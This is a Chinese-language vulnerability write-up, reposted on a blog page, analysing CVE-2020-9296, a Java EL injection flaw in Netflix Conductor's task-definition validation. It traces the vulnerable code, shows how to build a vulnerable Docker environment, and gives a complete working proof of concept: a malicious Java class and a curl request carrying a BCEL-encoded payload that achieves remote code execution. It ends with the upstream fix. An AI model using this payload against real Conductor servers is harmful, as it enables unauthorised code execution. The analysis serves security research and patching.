CVE-2020-9296-Netflix-Conductor-RCE-漏洞分析

最新推荐文章于 2024-07-17 20:06:21 发布
最新推荐文章于 2024-07-17 20:06:21 发布
阅读量1.6k 收藏
点赞数
分类专栏: CVE漏洞库 文章标签: 安全
原文链接:https://xz.aliyun.com/t/7889
版权

漏洞通告

https://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2020-001.md

Netflix Conductor是 Netflix 开发的一款工作流编排的引擎,项目地址:https://github.com/Netflix/conductor ,本次漏洞成因在于自定义约束冲突时的错误信息支持了 Java EL 表达式,而且这部分错误信息是攻击者可控的,所以攻击者可以通过注入 Java EL 表达式进行任意代码执行。

漏洞分析

根据通告的漏洞描述,可以看到漏洞问题出在对 buildConstraintViolationWithTemplate 函数的不当使用上,和今年的另一个 CVE-2020-10199,Nexus Repository Manager RCE 的成因相同。

Description:

Netflix Conductor uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, different types of interpolation are supported, including Java EL expressions. If an attacker can inject arbitrary data in the error message template being passed to ConstraintValidatorContext.buildConstraintViolationWithTemplate() argument, they will be able to run arbitrary Java code.

对该代码进行全局搜索,可以看到 TaskTimeoutConstraint.java 使用了该函数,且函数参数是利用 String.format(0) 生成的格式化字符串,格式化过程中存在用户可控的变量。

下一步继续关注 TaskTimeoutConstraint.java 在哪被使用,通过 Intellij 的引用搜索,定位到 common/src/main/java/com/netflix/conductor/common/metadata/tasks/TaskDef.java 文件:

可以看到 TaskTimeoutConstraint 注解到了 TaskDef 类上,那么下一步进行看 TaskDef 类会在哪里被使用,继续搜索全局引用,可以看到 jersey/src/main/java/com/netflix/conductor/server/resources/MetadataResource.java 会
把该类和路由 /api/metadata/taskdefs 绑定,即我们通过请求该路由,即可获得 TaskDef 对象。

/*省略注释*/

package com.netflix.conductor.server.resources;

import ...

/**
 * @author Viren
 */
@Api(value = "/metadata", produces = MediaType.APPLICATION_JSON, consumes = MediaType.APPLICATION_JSON, tags = "Metadata Management")
@Path("/metadata")
@Produces({MediaType.APPLICATION_JSON})
@Consumes({MediaType.APPLICATION_JSON})
public class MetadataResource {
    private final MetadataService metadataService;

    @Inject
    public MetadataResource(MetadataService metadataService) {
        this.metadataService = metadataService;
    }

    @POST
    @Path("/taskdefs")
    @ApiOperation("Create new task definition(s)")
    public void registerTaskDef(List<TaskDef> taskDefs) {
        metadataService.registerTaskDef(taskDefs);
    }

    @PUT
    @Path("/taskdefs")
    @ApiOperation("Update an existing task")
    public void registerTaskDef(TaskDef taskDef) {
        metadataService.updateTaskDef(taskDef);
    }

    @GET
    @Path("/taskdefs")
    @ApiOperation("Gets all task definition")
    @Consumes(MediaType.WILDCARD)
    public List<TaskDef> getTaskDefs() {
        return metadataService.getTaskDefs();
    }

    // 省略无关代码
}

阅读目录下的相关文档 docs/docs/labs/beginner.md,可以知道如何访问该 api:

curl -X POST \
  http://localhost:8080/api/metadata/taskdefs \
  -H 'Content-Type: application/json' \
  -d '[
    {
      "name": "verify_if_idents_are_added",
      "retryCount": 3,
      "retryLogic": "FIXED",
      "retryDelaySeconds": 10,
      "timeoutSeconds": 300,
      "timeoutPolicy": "TIME_OUT_WF",
      "responseTimeoutSeconds": 180
    },
    {
      "name": "add_idents",
      "retryCount": 3,
      "retryLogic": "FIXED",
      "retryDelaySeconds": 10,
      "timeoutSeconds": 300,
      "timeoutPolicy": "TIME_OUT_WF",
      "responseTimeoutSeconds": 180
    }
]'

所以漏洞最终的利用逻辑如下:

  1. 通过 POST 请求访问 URL /api/metadata/taskdefs 创建 TaskDef 对象
  2. 由于我们构造的参数中的 timeoutSeconds 和 responseTimeoutSeconds 满足了 taskDef.getTimeoutSeconds() > 0 以及 taskDef.getResponseTimeoutSeconds() > taskDef.getTimeoutSeconds() 这两个条件,TaskTimeoutValidator 校验失败,TaskDef 的 name 属性作为错误信息的一部分通过 buildConstraintViolationWithTemplate(0) 输出
  3. 由于 name 是我们构造好的 Java EL 表达式,所以最后该表达式会被执行,进而成功触发远程代码执行

漏洞利用

环境构建

# 下载源码
git clone https://github.com/Netflix/conductor.git
cd conductor
# 切换到存在漏洞的分支
git checkout v2.25.0
# 启动 docker
cd docker
docker-compose up -d

正常运行后效果如下图:

RCE

这里利用 com.sun.org.apache.bcel.internal.util.ClassLoader 加载我们构造好的恶意类的方式来触发远程执行。

其中恶意构造好的 java 类代码如下:

public class Evil {
    public Evil() {
        try {
            Runtime.getRuntime().exec("touch /tmp/pwned");
        } catch (Exception e) {
            e.printStackTrace();
        }

    }

    public static void main(String[] args) {
    }
}

将恶意构造的 class 文件通过 bcel 编码后作为参数,构造出 EL 表达式,作为 name 属性的值:

curl --location --request POST 'http://localhost:8080/api/metadata/taskdefs' \
--header 'Content-Type: application/json' \
--data-raw '[{
  "name": "${'\'' '\''.getClass().forName('\''com.sun.org.apache.bcel.internal.util.ClassLoader'\'').newInstance().loadClass('\''$$BCEL$$$l$8b$I$A$A$A$A$A$A$Am$91$cdN$c2$40$U$85$cf$94J$b1$W$a9$u$u$f8$af$LQ$T$d9$b8$c3$b81$b8$c2$9f$I$d1$85$hK$99$e0$m$b4M$j$d07r$cd$G$8d$L$l$c0$87R$ef$8c$89$98h$93$b93$f7$dcs$bf$9b$99$be$7f$bc$be$B$d8$c7$a6$8d$U$e6l$e4$90Oa$5e$ed$L$W$K6$sP$b4$b0ha$89$ny$m$C$n$P$Z$S$a5$edK$G$f3$ulq$86LM$E$fc$b4$dfk$f2$b8$e15$bb$a4$a4$eb$d2$f3$efN$bcH$e7$ba$bb$40$f6$9e$t$C$86$7c$e9$ba$d6$f1$G$5e$b9$eb$F$edr$5d$c6$ohW$U$ce$ae$87$fd$d8$e7$c7B$n$s$ab$D$d1$ddS$3e$H$93$b0$z$y$3bX$c1$w$83$x$c3$be$7f$bbV$96$bd$a8$i$3d$E$bc$e5$60$N$eb$M$b3cf$f5$d1$e7$91$Ua$e0$60$D6$NV$y$ea$i$3b$ce$9a$j$eeK$86$99$b1t$d1$P$a4$e8$d1d$bb$cd$e5O$92$xm$d7$fex$w$84$e4$8f$dcg$d8$w$fds$95_$d2y$i$fa$fc$fe$9e$g2$R$V$a5$7e$97F$ec$f9$i$eb$b0$e8$bd$d5g$80$a9$xR$9c$a2$ec$86r$83$f6$fc$ce3$d8$L$8clb$E$f3$ea$J$a9$da$ee$I$c9$n$b9L$a4$e1$d2o1$e0$90$af$88$a4f$98Z$b7te$86$b4$i$d1$d3Tqa$7cR$60$W$a6U$c8$984$cb$r$c7$f7$b4$C$z$a6$d6P$l$U0$a9$F$87bV$83g$bf$AU$b9$Sh$o$C$A$A'\'').newInstance().class}",
  "ownerEmail": "test@example.org",
  "retryCount": 3,
  "timeoutSeconds": 1200,
  "inputKeys": [
    "sourceRequestId",
    "qcElementType"
  ],
  "outputKeys": [
    "state",
    "skipped",
    "result"
  ],
  "timeoutPolicy": "TIME_OUT_WF",
  "retryLogic": "FIXED",
  "retryDelaySeconds": 600,
  "responseTimeoutSeconds": 3600,
  "concurrentExecLimit": 100,
  "rateLimitFrequencyInSeconds": 60,
  "rateLimitPerFrequency": 50,
  "isolationgroupId": "myIsolationGroupId"
}]'

进入 docker 后可以看到成功触发 RCE:

漏洞修复

根据漏洞相关的 pull requests:https://github.com/Netflix/conductor/pull/1543 可以定位对该漏洞的修复:

开发者将 org.hibernate:hibernate-validator 替换为了 org.apache.bval:bval-jsr,而后者在最新版本下不会解析 Java EL 表达式,所以也不会有 RCE 的危险。

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Netflix发现了严重的Kubernetes HTTP / 2漏洞
开源云中文社区
08-28 282
在了解互联网的HTTP / 2协议如何工作的时候,Netflix工程师发现了Kubernetes的一系列漏洞。主要的漏洞是在用Go语言编写的net / https库中找到...
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 898
任务环境说明:服务器场景:Server1。
深信服 EDR终端检测响应平台 0day RCE 漏洞
xj28555的博客
08-18 920
0x01 介绍 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 Fofa关键字: title=“终端检测响应平台” 如图 0x02 RCE payload https://xxx.com:xxx/tool/log/c.p
Apache Tomcat BeanFactory +EL表达式注入
最新发布
2401_85480529的博客
07-17 121
是一种特殊类型的引用对象,用于描述资源(如数据库连接、消息队列等)。在这个例子中,它用于描述一个 Java 对象。在这个例子中,JavaScript 代码创建了一个新的进程,执行。类,通过反射机制创建任意 Java Bean 实例,并调用它的 setter 方法来执行恶意代码。这个例子演示了如何利用 JNDI 注入漏洞,通过反射和表达式语言注入来实现远程代码执行。属性的值,该值是一个恶意的 EL 表达式。这个命令将尝试连接到指定的域名,通常用于验证漏洞利用是否成功。属性的 setter 方法名。
tcp协议缓冲区溢出_Treck TCP/IP协议库高危漏洞风险提示
weixin_39849942的博客
12-10 602
漏洞公告近日,Treck官方发布了TCP/IPv4/v6关联协议的安全更新,此次补丁修复了一组高危漏洞CVE编号有19个(CVE-2020-11896、CVE-2020-11897、CVE-2020-11898、CVE-2020-11899、CVE-2020-11900、CVE-2020-11901、CVE-2020-11902、CVE-2020-11903、CVE-2020-1190...
ip分片代码_原创 | Ripple20:Treck TCP/IP协议栈漏洞分析与验证
weixin_39965514的博客
11-22 256
作者:启明星辰ADLab一、前言国外安全研究人员在由Treck开发的TCP/IP协议栈中发现了多个漏洞,这一系列漏洞统称为Ripple20。这些漏洞广泛存在于嵌入式和物联网设备中,影响了多个行业领域(包括医疗、运输、能源、电信、工业控制、零售和商业等),涉及了众多供应商(包括HP、Schneider Electric、Intel、Rockwell Automation、Caterpill...
Spring Rce 漏洞分析CVE-2022-22965
embelfe_segge的博客
08-02 3861
SpringFramework是一个开源的轻量级J2EE应用程序开发框架。3月31日,VMware发布安全公告,修复了SpringFramework中的远程代码执行漏洞CVE-2022-22965)。在JDK9及以上版本环境下,可以利用此漏洞在未授权的情况下在目标系统上写入恶意程序从而远程执行任意代码。...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
Validator校验器中重新定义默认的错误信息模板
ninghuax的博客
08-07 9331
       主要的方法是使用传递的ConstraintValidatorContext对象可以添加额外的错误消息,或者完全禁用默认的错误信息而使用完全自定义的错误信息。        至于简单的通过注解定义默认的错误信息模板可以查看其他牛人的博客。但是有时候在自定义的Validator校验器中不单单只是类似非空判断这些简单的校验,有可能发生一些常见的情况如:在类校验器重需要同时校验该类中的多个属...
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8102
多次跳转导致的ssrf
[虎符CTF 2021]Internal System
weixin_43610673的博客
06-19 766
主要记录下解题过程,详细的分析:虎符 CTF2021 Web 零解题 Internal System WriteUp 打开是个登陆界面,F12可以看到提示 访问/source得到源码 先看/login路由的内容 Nodejs审计的不多,所以这里是直接截图大佬的博客。 这里通过数组来绕过admin限制,而数组在后面和salt字符串拼接后转为字符串,不影响后面的逻辑。 /login?username[]=admin&password=admin 跳转到一个代理器页面,通过这个页面我们可以直接访问到
conductor服务编排http任务安排
lyf_ldh的博客
12-12 2428
# 文档 http://wiki.ttxit.com/pages/viewpage.action?pageId=25919490 # 编排 1.定义任务:http://localhost:8080/api/metadata/taskdefs [{   "name": "user_task",   "retryCount": 3,   "timeoutSeconds": 1200,   "input...
Netflix Conductor:微服务编排引擎
热门推荐
Joy0921的博客
01-09 1万+
原文:Netflix Conductor : A microservices orchestrator 作者:Viren Baraiya, Vikram Singh 翻译:Daisy 责编:仲培艺 ConductorNetflix开源的一款微服务编排引擎,托管在GitHub上,使用Apache License 2.0许可。Conductor是受到Netflix需要运行全球流媒体业务流...
netflix conductor安装
ichigorukia123的博客
07-31 1702
netflix conductor安装 前言 ​ conductornetflix公司开源的一款微服务编排框架,用于简化服务调度配置,使用户聚焦核心的业务代码实现,并且提供一定的监控功能。 ​ 官网功能介绍以及安装配置如下:https://netflix.github.io/conductor/architecture/ 环境要求 centos7+(支持主流系统,包括windows、mac) gradle4.8 node.js11.0.0 jdk1.8+ nodejs安装参考https
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值